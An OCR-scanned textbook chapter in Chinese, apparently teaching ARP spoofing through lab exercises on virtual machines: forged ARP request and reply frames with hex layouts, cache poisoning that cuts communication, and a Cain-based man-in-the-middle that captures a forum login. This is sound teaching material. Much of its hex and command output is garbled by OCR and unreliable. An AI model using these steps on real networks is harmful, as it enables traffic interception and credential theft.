文 发 送出 去 。 受 害 者 主机 收 到 这 个 ARP 请 求 报 文 之 后 ,会 将 这 对 错误 的 IP 和 MAC 地 
址 映射 记录 添加 到 自己 的 ARP 缓存 表 中 。 下 面 通过 一 个 实例 来 分 析 这 种 攻击 。 

训练 : 利用 伪造 的 ARP 请 求 报 文 刷新 目标 主机 的 缓存 表 。 实 验 流程 大 致 如 下 : 首 
先 以 host-only 方式 启动 Windows 2000 和 Windows XP 虚拟 机 ,配置 IP 地 址 使 得 本 机 、 
Windows 2000 虚拟 机 和 Windows XP 虚拟 机 处 于 同一 网 段 。 本 机 作为 攻击 者 伪造 一 个 
发 送 给 Windows XP 虚拟 机 的 ARP 请 求 报 文 , 在 发 送 方 地 址 处 填充 Windows 2000 虚拟 
机 的 IP 地 址 和 错误 的 MAC 地 址 05-05-05-05-05-05 ,发 送 伪造 报 文 之 后 ,查看 Windows 
XP 虚拟 机 的 ARP 缓存 表 中 是 否 添加 了 这 对 错误 的 映射 记录 并 测试 通信 情况 。 

第 一 步 : 以 host-only 方式 启动 Windows 2000 和 Windows XP 虚拟 机 ,配置 
Windows 2000 虚拟 机 IP 地 址 为 192. 3. 3. 1、Windows XP 虚拟 机 IP 地址 为 192. 3. 3. 10， 


本 机 IP 地 址 为 192. 3. 3. 20, 地 址 配置 结果 如 图 4-14 所 示 。 
本 机 (攻击 者 ) 
192.3.3.20 | 


00-50-56-c0-00-01 G3 


= host-only 


192.3.3.1 192.3.3.10 
00-0c-29-66-07-61 于 ”00-0c-29-a3-70-3b 
Windows 2000 虚 拟 机 Windows XP 虚拟 机 (受害 者 ) 


图 4-14 地 址 信息 
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第 二 步 : 在 本 机 利用 Sniffer Pro 伪造 一 个 ARP 请 求 报 文 ,在 本 机 利用 该 报 文 刷 新 
Windows XP 虚拟 机 的 ARP 缓存 表 , 使 得 Windows 2000 虚拟 机 的 IP 地 址 映射 为 错误 的 
MAC 地 址 05-05-05-05-05-05。 图 4-15 和 图 4-16 是 伪造 的 ARP 请 求 报 文 格式 以 及 报 文 
的 十 六 进 制 表示 。 注 意 : 在 ARP 数据 中 发 送 方 地 址 处 填充 了 一 对 错误 的 映射 记录 , 即 
Windows 2000 虚拟 机 的 IP 映射 为 错误 的 MAC 地 址 05-05-05-05-05-05 。 


0001 | 0800 

06 | 04 2 “| 一 一 ARP 请 求 报 文 

填充 一 对 错误 /| 05.05.05.05.05.05 | 一 一 发 送 方 MAC: 伪 造 的 MAC 

的 地 址 映射 | C0.03.03.1 。 “| 一 一 发 送 方 IP:192.3.3.1 

00.00.00.00.00.00 | 一 一 接收 方 MAC:Windows XP 虚拟 机 MAC 
C0.03.03.0a 。 | 一 一 接收 方 IP:192.3.3.10 


14B 个 18B 
Link data “| 0806 ARP data padding 
UL I 28B 


FF.FF.FF.FF.FF.FF | 目的 MAC: 广 播 地 址 
00.0c.29.66.07.61 | 源 MAC:Windows 2000 虚 拟 机 MAC 


图 4-15 第 一 种 方法 利用 伪造 的 ARP 请 求 报 文 实现 欺骗 


发 送 方 MAC: 伪造 地 址 ”发 送 方 ITP: 2000 虚 拟 机 
目的 MAC :广播 地 址 源 MAC:2000 虚 拟 机 MAC 
Dp000: £f ft ££f| ff ff ff 00 Oc 29 |66 07 61|08 06 00 01|1 
pol0: 08 00 06 04 00 01 05 05 05 05 05 05|c0 03 03 01|| .. 
poz0: 00 00 00 00 00 00 co 03 03 0a 00 00 00 00 00 00 | .. 
poso: 00 00 00|0o 00 00 00 00100 00 00 00 

接收 方 MAC:0 填 充 接收 方 ITP: XP 谋 拟 机 


图 4-16 本 机 伪造 的 ARP 请 求 报 文 


在 本 机 连续 发 送 伪造 的 ARP 请 求 报 文 。Windows XP 虚拟 机 收 到 ARP 请 求 报 文 后 
发 现 这 是 在 询问 自己 的 MAC 地 址 ,于 是 在 返回 ARP 应 答 报 文 之 前 将 ARP 数据 中 发 送 
方 地 址 处 填充 的 错误 映射 记录 添加 到 自己 的 ARP 缓存 表 中 。 图 4-17 为 ARP 欺骗 攻击 


C:\WINDOYS\systen32\cad. exe [-Ic[xl 
C:\Documents and SettingsNYou>arp -a 


Interface: 192.3.3.10 --- OQx10003 
Internet Address Physical hddress Type 
192.3.3.1 00-Qc-29-66-07-61 dynamic 
攻击 前 
C:\Documents and Settings\You>arp -a 
Interface: 192.3.3.10 --- OQx10003 
Internet Address Physical hddress Type 
192.3,3.1 085-05-05-05-05-05 dynamic 
一 一 攻击 后 


图 4-17 攻击 前 后 Windows XP 虚拟 机 缓存 表 对 比 
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前 后 在 Windows XP 虚拟 机 上 查看 缓存 的 结果 ,可 见 在 攻击 之 后 错误 的 地 址 映射 记录 已 
经 进入 Windows XP 虚拟 机 的 缓存 表 , 即 Windows 2000 虚拟 机 的 IP 地 址 被 映射 为 错误 
的 MAC 地 址 。 

攻击 成 功 之 后 ,Windows XP 虚拟 机 向 Windows 2000 虚拟 机 发 送 IP 数据 报时 ,由 于 
缓存 表 中 已 经 了 Windows 2000 虚拟 机 的 MAC 地 址 ,因此 Windows XP 虚拟 机 直接 
使 用 这 个 错误 的 MAC 地 址 与 Windows 2000 虚拟 机 通信 , 即 Windows XP 虚拟 机 发 给 
Windows 2000 虚拟 机 的 所 有 IP 数据 报 目 的 MAC 地 址 均 为 05-05-05-05-05-05 。 
Windows 2000 虚拟 机 不 会 接收 这 类 IP 数据 报 ,因此 两 台 虚 拟 机 的 通信 将 中 断 。 


图 4-18 为 攻击 成 功 之 后 在 Windows XP 虚拟 机 上 执行 ping 192. 3. 3. 1 的 结果 ,可 见 通 信 
已 经 中 断 。 


E VS\systen32\cnd. exe -| 


Interface: 192.3.3.10 --- 9x19963 
Internet hddress Physical hddress Tupe 
cE 192.3.3.1 805-05-05-05-05-05 dynamic 
错误 映射 站 


C:\Documents and SettingsNYou>ping 192.3.3.1 
Pinging 192.3.3.1 with 32 bytes of data: 
Request timed 

Cd 王 llRequest timed 

通信 中 断 | timed 
1 timed 


stics for 192.3.3.1: 
Packets: Sent : 4, Received : 0, Lost : 4 (100% loss), 


le: \Documents and Settings\You> 


图 4-18 在 Windows XP 虚拟 机 上 执行 ping 192. 3. 3. 1 不通 


图 


19 为 在 本 机 捕获 的 Windows XP 虚拟 机 发 出 的 IP 数据 报 ,可 以 发 现 报 文 的 目 
的 MAC 地 址 为 05-05-05-05-05-05。 


性 讶 的 目的 MAC 子 囊 源 IP:192. 3. 3. 10 
0000000 De 3 3 70 3b 
0000010 c0 0 
0000020 : 6 
0000030 71 72 
0000040 
目的 IP: 19 


图 4-19 Windows XP 虚拟 机 发 出 的 IP 数据 报 


攻击 成 功 之 后 ,在 Windows 2000 虚拟 机 上 会 弹出 一 个 IP 地 址 冲突 提示 框 , 如 
图 4-20 所 示 , 这 是 4 什么 原因 导致 的 呢 ? 由 
于 伪造 的 ARP 请 求 报 文 是 以 广播 方式 发 [生生 起 和 
送 ,这 样 Windows 2000 虚拟 机 也 会 收 到 这 a 
个 报 文 , 它 发 现 这 个 ARP 请 求 报 文 的 发 送 
方 MAC 地 址 与 自己 不 同 ,但 发 送 方 IP 地 址 
与 自己 相同 ,于 是 它 认 为 网 络 中 有 另外 一 台 图 4-20 第 一 种 方法 可 能 产生 地 址 冲突 报警 
主机 设置 了 与 自己 相同 的 IP 地 址 ,因此 弹 
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出 一 个 IP 地 址 冲突 提示 框 。 可 见 使 用 第 一 种 方式 进行 欺骗 攻击 隐蔽 性 不 好 , 接 下 来 要 学 
习 的 第 二 种 方式 则 具有 较 好 的 隐蔽 性 。 

第 二 种 方法 是 通过 伪造 的 ARP 应 答 报 文 来 实现 ARP 欺骗 。 攻 击 者 伪造 一 个 ARP 
应 答 报 文 , 在 ARP 数据 中 发 送 方 IP 和 MAC 地 址 处 填充 一 对 错误 的 映射 地 址 ,之 后 将 报 
文 发 送出 去 。 受 害 者 主机 收 到 这 个 ARP 应 答 报 文 之 后 ,会 将 这 对 错误 的 IP 和 MAC 地 
址 映射 记录 添加 到 自己 的 ARP 缓存 表 中 。 下 面 通过 一 个 实例 来 分 析 这 种 攻击 。 

训练 : 利用 伪造 的 ARP 应 答 报 文 刷新 目标 主机 的 缓存 表 。 实 验 环境 与 第 一 种 方法 
相同 。 实 验 流程 大 致 如 下 : 本 机 作为 攻击 者 伪造 一 个 发 送 给 Windows XP 虚拟 机 的 
ARP 应 答 报 文 ,在 发 送 方 地 址 处 填充 Windows 2000 虚拟 机 的 IP 地 址 和 错误 的 MAC 地 
址 06-06-06-06-06-06 ,发 送 伪造 报 文 之 后 ,查看 Windows XP 虚拟 机 的 ARP 缓存 表 中 是 
否 添加 了 这 对 错误 的 映射 记录 并 测试 通信 情况 。 

第 一 步 : 在 本 机 利用 Sniffer Pro 伪造 一 个 的 ARP 应 答 报 文 ,在 本 机 利用 该 报 文 刷新 
Windows XP 虚拟 机 的 ARP 缓存 表 , 使 得 Windows 2000 虚拟 机 的 IP 地 址 映射 为 错误 的 
MAC 地 址 06-06-06-06-06-06。 图 4-21 和 图 4-22 是 伪造 的 ARP 应 答 报 文 格式 以 及 报 文 
的 十 六 进 制 表示 。 注 意 : 在 ARP 数据 中 发 送 方 地 址 处 填充 了 一 对 错误 的 映射 记录 , 即 
Windows 2000 虚拟 机 的 IP 映射 为 错误 的 MAC 地 址 06-06-06-06-06-06 。 


0800 


06 | 04 | ”2 “| 一 ARP 应答 报 文 
填充 一 对 错误 06.06.06.06.06.06 | 一 一 发送 方 MAC: 错 误 的 MAC 
的 地 址 映射 c0.03.03.1 一 一 发 送 方 1P:192.3.3.1 Windows 2000 虚 拟 机 


00.0c.29.a3.70.3b | 一 一 接收 方 MAC:Windows XP 虚拟 机 MAC 
c0.03.03.0a 一 一 接收 方 IP:192.3.3.10 Windows XP 虚拟 机 


14B 由 18B 


Link data “| 0806 ARP data 


U 28B 


00.0c.29.a3.70.3b | 目的 MAC:Windows XP 虚拟 机 MAC 
00.0c.29.66.07.61 | 源 MAC:Windows 2000 虚 拟 机 MAC 


图 4-21 第 二 种 方法 利用 伪造 的 ARP 应 答 报 文 实现 欺骗 


发 送 方 MAC: 错 误 地 址 发送 方 ITP:2000 庶 拟 机 
目的 MAC: XP 虚拟 机 源 MAC:2000 虚 拟 机 


0000: 00 Oc 29|a3 70 3b 00 Oc 29|66 07 61 08 06 00 01|| ..).pz-.)ft.a.... 
0010: 08 00 06 04 00 02 06 O06 06 06 06 06| co0 03 03 01|| -.-.--.--.--....- 
0020: 00 Oc 29 a3 70 3b c0 03 03 Oa | ee 

| 


接收 方 MAC :XP 座 拟 机 接收 方 IP:XP 谋 拟 机 
图 4-22 本 机 伪造 的 ARP 应 答 报 文 


在 本 机 连续 发 送 伪造 的 ARP 应 答 报 文 。Windows XP 虚拟 机 收 到 ARP 应 答 报 文 后 
认为 这 是 Windows 2000 虚拟 机 发 送 给 自己 的 ,于 是 将 错误 的 映射 记录 添加 到 自己 的 
ARP 缓存 表 中 。 图 4-23 为 ARP 欺骗 攻击 前 后 在 Windows XP 虚拟 机 上 查看 缓存 的 结 
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果 ,可见 在 攻击 之 后 错误 的 地 址 映射 记录 已 经 进入 Windows XP 虚拟 机 的 缓存 表 , 即 
Windows 2000 虚拟 机 的 IP 地 址 被 映射 为 错误 的 MAC 地 址 06-06-06-06-06-06 。 


RDOWS\systea32 [x| 
:\Documents and Settings\YouYarp -a 


Interface: 192.3.3.10 --- Ox10003 
Internet Address Physical Address Type 
192.3.3.1 99-9c-29-66-97-61 dynamic cp 
DR 攻击 前 
C:\Documents and Settings\You>arp -a 
Interface: 192.3.3.10 --- Qx10003 
Internet Address Physical Address Type 
192.3.3.1 96-96-696-96-96-66 dunamic a 
一 


图 4-23 ”攻击 前 后 Windows XP 虚拟 机 缓存 表 对 比 


攻击 成 功 之 后 ,Windows XP 虚拟 机 向 Windows 2000 虚拟 机 发 送 IP 数据 报时 ,由 于 
缓存 表 中 已 经 保存 了 Windows 2000 虚拟 机 的 MAC 地 址 ,因此 Windows XP 虚拟 机 直接 
使 用 这 个 错误 的 MAC 地 址 与 Windows 2000 虚拟 机 通信 , 即 Windows XP 虚拟 机 发 给 
Windows 2000 虚拟 机 的 所 有 IP 数据 报 目 的 MAC 地 址 均 为 06-06-06-06-06-06。 
Windows 2000 虚拟 机 不 会 接收 这 类 IP 数据 报 , 因 此 两 台 虚 拟 机 的 通信 将 中 断 。 图 4-24 
为 攻击 成 功 之 后 在 Windows XP 虚拟 机 上 执行 ping 192. 3. 3. 1 的 结果 ,可 见 通信 已 经 
中 断 。 


C:\Documents and SettingsN\You>arp -a 


Interface: 192.3.3.19 --- Ox10003 

Internet hddress Physical hddress Type 
错误 的 映射 记录 192.3.3.1 06-06-06-06-06-06 dynamic 
C:\Documents and Settings\You>ping 192.3.3.1 


pinging 192.3.3.1 with 32 bytes of data: 


Request timed out. 
网 Request timed out. 
通信 中 断 Request timed out . 
Request timed out . 


Ping statistics for 192.3.3.1: 
Packets: Sent : 4, Received : 0, Lost : 4 (199X loss), 


图 4-24 在 Windows XP 虚拟 机 上 执行 ping 192. 3. 3. 1 不通 


图 4-25 为 在 本 机 捕获 的 Windows XP 虚拟 机 发 出 的 IP 数据 报 , 可 以 发 现 报 文 的 
的 MAC 地 址 为 06-06-06-06-06-06 。 


错误 的 MAC 地 址 源 IP: 192. 3. 3. 10 
00000000: 06 06 06|06 06 06 00 Oc 29 a3 70 08 00 45 00 
00000010: 00 3c 01 0 00 ]1 47 c0_0 
00000020: 0 0 


00000030: 
00000040 : 


目的 IP:192. 3. 3. 1 


图 4-25 Windows XP 虚拟 机 发 出 的 IP 数据 报 
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伪造 的 ARP 应 答 报 文 只 会 传递 给 受害 者 ,其 他 主机 不 会 收 到 ,因此 第 二 种 ARP 欺 
骗 方式 隐蔽 性 更 强 。 


“| 国 基于 ARP 欺骗 的 “中 间 人 ”攻击 


45.1 “中 间 人 ”攻击 简介 


“中 间 人 ”攻击 (图 4-26) 是 指 攻击 者 利用 某 种 方法 攻击 网 络 内 的 特定 两 台 主机 ,使 得 
这 两 台 主 机 之 间 的 通信 数据 经 过 攻击 者 主机 中 转 , 在 进行 数据 中 转 的 过 程 中 ,攻击 者 可 以 
进行 数据 监听 ,数据 自 改 、 网 页 挂 马 .DNS 重 定向 等 攻击 行为 。 可 以 说 “中 间 人 ”攻击 对 网 
络 安全 构成 了 严重 威胁 ,研究 这 种 攻击 行为 对 网 络 安全 管理 工作 具有 实际 意义 。 

目前 “中 间 人 ”攻击 可 以 通过 ARP 欺骗 .ICMP 重 定向 .路 由 欺骗 等 多 种 方法 实现 ,本 
章 研 究 基 于 ARP 欺骗 的 “中 间 人 ”攻击 技术 。 


图 4-26 “中 间 人 ”攻击 


下 面 结合 实例 研究 基于 ARP 欺骗 的 “中 间 人 ”攻击 。 以 host-only 方式 启动 
Windows 2000 虚拟 机 和 Windows XP 虚拟 机 , 按 图 4-27 配置 各 个 对 象 的 IP 地 址 ,使 得 
三 台 主 机 同 处 于 192. 3. 3. 0 网 段 。 攻 击 流程 大 致 如 下 : 首先 本 机 利用 ARP 欺骗 刷新 
Windows 2000 和 Windows XP 虚拟 机 的 缓存 表 , 使 得 Windows 2000 虚拟 机 的 缓存 中 
Windows XP 虚拟 机 的 IP 地 址 192. 3. 3. 3 映射 为 攻击 者 ( 即 本 机 ) 的 MAC,Windows XP 
虚拟 机 的 缓存 中 Windows 2000 虚拟 机 的 IP 地 址 192. 3. 3. 1 也 映射 为 攻击 者 ( 即 本 机 ) 
MAC。 这 样 一 来 ,Windows 2000 和 Windows XP 虚拟 机 之 间 的 通信 将 经 过 攻击 者 ( 即 本 
机 ) 中 转 , 本 机 成 为 它们 之 间 通 信 的 “中 间 人 ”, 本 机 可 以 实施 数据 监听 、 数 据 自 改 .木马 植 
入 等 攻击 行为 。 


452 测试 “中 间 人 ”攻击 


测试 流程 大 致 如 下 : 按 如 图 4-27 所 示 的 网 络 环境 配置 各 个 对 象 的 IP 地 址 ,在 
Windows 2000 虚拟 机 上 安装 一 个 “论坛 贴吧 ”站 点 ,注册 一 个 用 户 。 在 本 机 对 Windows 
2000 和 Windows XP 虚拟 机 实施 ARP 欺骗 攻击 ,监听 两 台 主 机 之 间 的 网 络 通 信 , 从 中 提 
取出 敏感 信息 (如 账户 、 密 码 ) 。 

第 一 步 : 按 图 4-27 配置 各 个 对 象 的 地 址 信息 ,测试 网 络 连通 情况 。 
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a0-a0-a0-a0-a0-a0 
Windows 2000 虚 拟 机 ~、~、、 
~ 


为 了 便 


Windows 2000 虚拟 机 为 例 介 


基础 mw 


ARP 缓 存 表 
192.3.3.3 b0-b0-b0-b0-b0-b0 


ARP 缓 存 表 
192.3.3.1 b0-b0-b0-b0-b0-b0 


192.3:3.0 


192.3.3.1 192.3.3.3 


c0-c0-c0-c0-c0-c0 
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\ 


192.3.32 、 | 
b0-b0-b0-b0-b0-b0 3 
本 机 (中 间 人 ) 


图 4-27 实验 拓扑 


于 后 面 分 析 网 络 数据 ,为 三 台 主 机 配置 容易 识别 的 MAC 地 址 ,这 里 以 
绍 手工 配置 MAC 地 址 的 方法 。 在 “网 络 与 拨号 连接 ”界面 


一 口 


右 击 “ 本 地 连接 ”一 选择 “属性 ”一 单 击 配 置 ”一 选择 “高 级 ”一 单 击 network address 一 在 
“ 值 ”文本 框 中 输入 “*b0b0b0b0b0b0” 一 单 击 “ 确 定 ” 按 钮 。 三 台 主 机 地 址 信息 见 图 4-28 一 
图 4-30。 
thernet adapter 本 二 
Description . . . - . . : AMD PCNET Family PCI Ethernet hdapter 
Physical Address. . . 。: AG-AG-AG-AG-AG-AG 
DHCP Enabled. - - - - - :No 
IP hddress- . 
Subnet Mask 
Default Gateway . - - - : 
图 4-28 Windows 2000 虚拟 机 的 地 址 信息 
thernet adapter 本 地 连接 : 
Description . . . . . . : AMD PCNET Family PCI Ethernet hdapter 
Physical Address. . . . : B98-B8-B8-B8-B8-BO 
DHCP Enabled. . - - - - :No 
IP hddress- . .....: 192.3.3.2 
Subnet Mask . . - - - - : 255.255.255.8 
Default Gateway . - . - : 
图 4-29 本 机 的 地 址 信息 
thernet adapter 本 地 连接 : 
Description . - - - - - - : UMware Accelerated AMD PCNet hdapter 
Physical hddress- . . . : 5C9-C9-Ce9-C9-C8-C8 
Dhcp Enabled. 2 
IP hddress- - 
Subnet Mask - 
Default Gateway - - - - - : 
图 4-30 Windows XP 虚拟 机 的 地 址 信息 
第 二 步 : 在 Windows 2000 虚拟 机 上 安装 一 个 “论坛 贴吧 ”站 点 ,注册 一 个 用 户 。 


将 “论坛 贴吧 ”站 点 的 脚本 文件 放置 到 Windows 2000 虚拟 机 Web 服务 器 的 主 目录 


下 即 可 。 在 
第 三 步 
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Windows XP 虚拟 机 访问 站 点 ,并 注册 一 个 用 户 。 测 试 结果 如 图 4-31 所 示 。 
: 捕获 正常 状态 下 的 通信 数据 。 
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一 了 icrosoft Internet Explorer 


文件 四 ”编辑 中 查看 @ 收藏 和 工具 CI) 帮助 中 


@E- 日 -着 固 旨 时 次 x @ 卫 :各国 沪 


地 址 四 ) | 御 http://192.3.3. 1/index. asp 


0( 会 员 登 录 区 信 《IC 公告 
3 欢迎 来 到 深圳 城市 信息 贴吧 论坛 ! 
如 次 懒得 注册 ， 一 样 可 以 在 这 畅 所 欲 


试 ， 不 要 放 洪 水 哦 :) 


[0D(R 新 贴 了 者 ) 《一 TIT( 精 华 贴 子 | 


nm 入 rreey 加 化 十 订 仙 广 而 o1 
二 Internet 


图 4-31 在 Windows XP 虚拟 机 访问 “论坛 贴吧 ” 


图 4-32 为 使 用 Sniffer Pro 捕获 的 Windows XP 虚拟 机 提交 的 登录 报 文 ,其 目的 
MAC 为 Windows 2000 虚拟 机 、 源 MAC 为 Windows XP 虚拟 机 ,可 见 正常 情况 下 
Windows XP 虚拟 机 将 账户 信息 直接 传递 给 Windows 2000 虚拟 机 ,此 时 本 机 无 法 截获 通 
信 数 据 。 


目的 MAC:2000 虚 拟 机 源 MAC:xp 虚 瓜 机 


00000000: a0 a0 a0]a0 a0 a0 c0 c0 c0|c0 c0 c0 08 00 45 00 由 有 傍 惧 览 览 览 . .E 
00000010: 02 ea 04 Ob 40 00 80 06 ee 78 c0 03 03 03 c0 03 .j..@.1.nx?..7? 
00000020: 03 01 04 79 00 50 bé 7f b7 56 60 31 f2 5a 50 18 ...y.P? 稿 `1 马 P 
00000030: fa f0 b3 bb 00 00 50 4f 53 54 20 2f 61 63 63 65 郴 . .POST /acce 
00000040: 73 73 2e 61 73 70 20 48 54 54 50 2f 31 2e 31 0d ss.asp HTTP/1.1 
00000050: 0a 41 63 63 65 70 74 3a 20 69 6d 61 67 65 2f 67 .Accept: image/g 


中 间 连 续 数据 略 
00000220: 3d 31 39 32 33 33 33 0d 0a 0d 0a 75 73 65 72 6e =192333....usern 
00000230 : 6 ame=petertkpassywo 
00000240 : rd=86982480&url= 
00000250 : login.aspkinmageF 
00000260 : ield.x=1l&imageF 
00000270 : ield.y=9 


username=peter password=86982480 


图 4-32 Windows XP 虚拟 机 提交 的 登录 报 文 


第 四 步 : 在 本 机 使 用 cain 对 Windows 2000 和 Windows XP 虚拟 机 实施 ARP 欺骗 
攻击 。 

在 本 机 使 用 cain 对 Windows 2000 和 Windows XP 虚拟 机 实施 ARP 欺骗 攻击 ,操作 
步骤 如 下 : 首先 选择 IP 地 址 为 192. 3. 3. 2 的 网 卡 , 见 图 4-33, 之 后 cain 就 在 这 块 网 卡 上 
进行 数据 监听 和 实施 ARP 欺骗 攻击 。 之 后 单 击 start sniffer 按钮 ,开始 嗅 探 网 络 数据 。 
在 整个 攻击 过 程 中 cain 必须 始终 处 于 嗅 探 状态 。 

接 下 来 扫描 本 网 段 内 所 有 主机 的 IP 和 MAC 地址 。cain 要 实施 ARP 欺骗 攻击 就 必 
须 掌握 被 攻击 对 象 的 IP 和 MAC 地 址 。 步 骤 为 : 单 击 Sniffer 标签 一 在 空白 位 置 右 击 鼠 
标 一 选择 scan MAC address 一 单 击 “ 确 定 ?按钮 ,图 4-34 为 扫描 结果 。 

从 扫描 结果 中 选择 两 台 主 机 作为 攻击 目标 。 步 又 如 下 : 单 击 cain 左下 脚 APR 标 


学 


Configuration Dialog 


Filters and ports | ITP Fields | 
Traceroute | Certificate Spoofing | 
Sniffer | APR ( hrp Poison Routing ) | challenge Spoofing | 


255. 255. 255.1 
0.0.0.0 0.0.0.0 


四 \Devi ce\NPF_Generi 回回 四 


in 


Fie Configure Tools Help 
| 后 瑟 吉本 办 | 名 民 习 四 回国 回回 


沪 Decoders [名 Network [Bsniffer [7 cracker [ 信 Taceoue [HE ccou 


Winpeap Yersion 
4.1.0. 1452 


gerpri 
ADA0A0ADA0A0 一 一 2000 虚 拟 机 
Cocococococo 一 一 xP 虚拟 机 


\Device\NPF_{78A23C88-DD9E-4ABF-BBF3-A1BBSD90C957} 


Current Network Adapter 


WARNING 11! Only ethernet adapters supported 
Options 
厂 Start Sniffer on st [TF Don’ t use Promiscuous mode 
厂 Start APR on star- 


[| we | Fw | ww | 
图 4-33 选择 网 卡 图 4-34 扫描 结果 


签 一 在 页 框 空白 位 置 单 击 一 单 击 十 一 在 弹出 的 界面 选中 两 个 攻击 目标 ( 即 Windows 2000 
和 Windows XP 虚拟 机 ) ,结果 见 图 4-35。 


New ARP Poison Routing 


WARNTNG 111 


[ER enables you to hijack IF traffic between the selected host on the left 1ist and all selected 
osts on the right list in both directions, If a selected host has routing capabilities WAN 
traffic will be intercepted as well. Please note that since your machine has not the sane 

er formance of a router you could cause DoS if you set APR between your Default Gateway and all 
other hosts on your LAN. 


JP address 
192.3.3.1 ADADADADADAD 
192.3.3.3 Cocococococo 


图 4-35 选中 两 个 攻击 对 象 


单 击 “确定 ?按钮 之 后 这 条 攻击 规则 就 建立 好 了 ,但 它 当前 的 状态 是 Idle( 即 空闲 ), 见 

图 4-36 。 
开始 攻击 ,选中 新 建立 的 规则 一 单 击 start APR 按钮 ,攻击 状态 变 为 Poisoning( 正 在 

毒害 状态 ) , 见 图 4-37。 

第 五 步 : 查看 攻击 结果 。 

图 4-38 给 出 的 是 攻击 前 后 Windows XP 虚拟 机 的 缓存 表 , 可 见 Windows 2000 虚拟 
机 的 IP 地 址 被 错误 地 映射 为 攻击 者 (本 机 ) 的 MAC 地 址 。 这 样 一 来 Windows XP 虚拟 
机 发 给 Windows 2000 虚拟 机 的 数据 报 将 被 提交 给 本 机 。 
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第 4 章 ARP 及 ARP 欺骗 


Ele Yew Configure Tools Help 


| 而 @@ 志 路 路 | 可 | 区 | 由 本 加 四 国 瑟 回电 二 @?| 


最 Decoders [多 Network EE 区 cade [@ Traceroue [至 coou [8 wreess 全 


192,3,3,1 ADAOAOADADAD 


Lost packets; 0O% 


图 4-36 新 添加 的 规则 


Ele Vew Configure Tools Hep 


| 与 包 @ 坟 吹风 | 十 了 民 | 和 DI 四 O207? 


所 

Ei 

名 Decoders [多 Network [BB snifer [了 cracker [加 Taeoue | ccou [8 wreless [成 
IP address 

15 3 


Configuration | Routed Packets 


|® 


Lost packets: 0% 


图 4-37 开始 ARP 欺骗 攻击 


5 C:\WINDOYS\systen32\cad. exe 


[ET 


Interface: 192.3.3.3 --- OQx30003 
Internet Address Physical Address Type 
192.3.3.1 ag-ag-ag-ag-ag-ag dynamic es 
一 一 一 一 一 一 一 一 一 一 一 一 一 一 gi 志 
C:\Documents and SettingsNYou>arp -a 
Interface: 192.3.3.3 --- OQx30003 
Internet Address Physical Address Type 
192.3.3.1 b9-b9-b9-b9-b9-b9 dynamic Ee 
攻击 后 


C:\Documents and Settings\You> 
1 


图 4-38 攻击 前 后 Windows XP 虚拟 机 的 缓存 表 


图 4-39 给 出 的 是 攻击 前 后 Windows 2000 虚拟 机 的 缓存 表 , 可 见 Windows XP 虚拟 
机 的 IP 地 址 也 被 错误 地 映射 为 攻击 者 (本 机 ) 的 MAC 地 址 。 这 样 一 来 Windows 2000 虚 
拟 机 发 给 Windows XP 虚拟 机 的 数据 报 将 被 提交 给 本 机 。 

至 此 本 机 成 为 Windows 2000 和 Windows XP 虚拟 机 通信 的 “中 间 人 ”,Windows XP 
虚拟 机 发 出 的 包含 账户 信息 的 登录 报 文 将 经 过 本 机 中 转 ,本 机 可 以 从 中 提取 出 账户 信息 。 
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ystem32\cmd.exe 


C:\Documents and Settings\Administrator>arp -a 


Interface: 192.3.3.1 on Interface Ox?7000003 


Internet hddress Physical hddress Tupe 
192.3.3.3 cg9-cg9-cg-cg-cg-ce dynamic Se 
[一 攻击 前 
C:\Documents and SettingsNhdministrator>arp -a 
Interface: 192.3.3.1 on Interface QOQx7?0006003 
Internet hddress Physical hddress Type 
192.3.3.3 bg9-b9-b9-b9-b9-b9 dynamic 
| 一 攻击 后 
加 | 
图 4-39 攻击 前 后 Windows 2000 虚拟 机 的 缓存 表 
图 4-40 为 cain 截获 的 账户 信息 。 
并 画 回 四 


加 到 Ele Vew Configure Toos Hep 


|S 访 [加 赚 婴 十 名 可 | 各 四 加 国名 回归， @?| 
加 Decoders [二 Network EE Sniffer 区 Cracker 面 Traceroute 区 cou Te Waless 区 


YN Passwords S| | Timestamp HTTP server Client Username Password 
© FTP (0) 15/08/2005 - 03:51:37 192.3.3.1 192.3.3.3 Peter 86982480 
HTTP (CL 


由 户 信息 


IMAaP (0 
LDAP (0 
名 Pops0 
smb SMB (0) 
画 Telnet (( 
NC (0) 下 


图 4-40 ”cain 截获 的 账户 信息 


图 4-41 和 图 4-42 为 用 Sniffer Pro 捕获 的 两 个 登录 报 文 ,可 见 Windows XP 虚拟 机 
将 报 文 发 给 本 机 ,本 机 修改 报 文 的 源 和 目的 MAC 地址 之 后 将 其 转发 给 Windows 2000 虚 
拟 机 ,对 于 Windows XP 和 Windows 2000 虚拟 机 来 说 ,它们 不 会 察觉 通信 存在 异常 ,但 
Windows XP 虚拟 机 提交 的 账户 信息 已 被 攻击 者 悄悄 记 下 。 


目的 MAC: 本 机 源 丽 C:XP 丽 所 机” 源 IP:192. 3. 3.3 
45 00 著 蒜 地 览 览 览 ..E 


00000000 
00000010 
00000020 
00000030 
00000040 : 
00000050 
00000060 


目的 IP:192. 


00000220 
00000230 
00000240 
00000250 
00000260 
00000270 


image 


图 4-41 Windows XP 发 给 本 机 的 登录 报 文 
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目的 MAC:2000 庶 拟 机 放 MAC: 本 机 源 IP:192. 3. 3. 3 


00000000: a0 a0 a0|a0 a0 a0 b0 b0 b0|b0 b0 b0 08|00 45 00 朵 位 租 蔷 豆 琢 . .E 
00000010: 02 6a 04 dc 40 00 80 06 6d a7 c0 03 03|03 c0 03 j. 回 5_mo 4 
00000020: 03 01 04 82 00 50 se 79 30 81 92 93 4c 55 50 18 ?3P 至 0 分 摊 XP 
00000030: falf0 cf 2e 00 00 50 4f 53 54 20 2f 61 63 63 65 ?.. POST /acce 


00000040: 73|73 2e 61 73 70 20 48 54 54 50 2f 31 2e 31 0d ss.asp HTTP/1.1 
00000050: 0a|41 63 63 65 70 74 3a 20 69 6d 61 67 65 2f 67 .accept: image/g 
00000060: 69166 2c 20 69 6d 61 67 65 2f 78 2d 78 62 69 74 if., image/z-xbit 


目的 IP: 192. 3. 3. 1 中 间 连 续 访 间 咯 


00000220: 3d 31 39 32 33 33 33 0d 0a 0d 0a 75 73 65 72 6e =192333 es 

00000230: 61 6d 65 3d 70 65 74 65 72 26 70 61 73 73 77 6f ame=petertd 

: 3 4 38 30 26 75 72 6c 3d 2d288362888&uzrI 

00000250: 6c 6f 67 59 6e|ze 61 73 70[26 59 6d 61 67 65 46 login.asp&inageF| 

00000260: 69 65 6c 64 2e|78 3d 32 38|26 69 6d 61 67 65 46 ield.x=28&inmageF| 

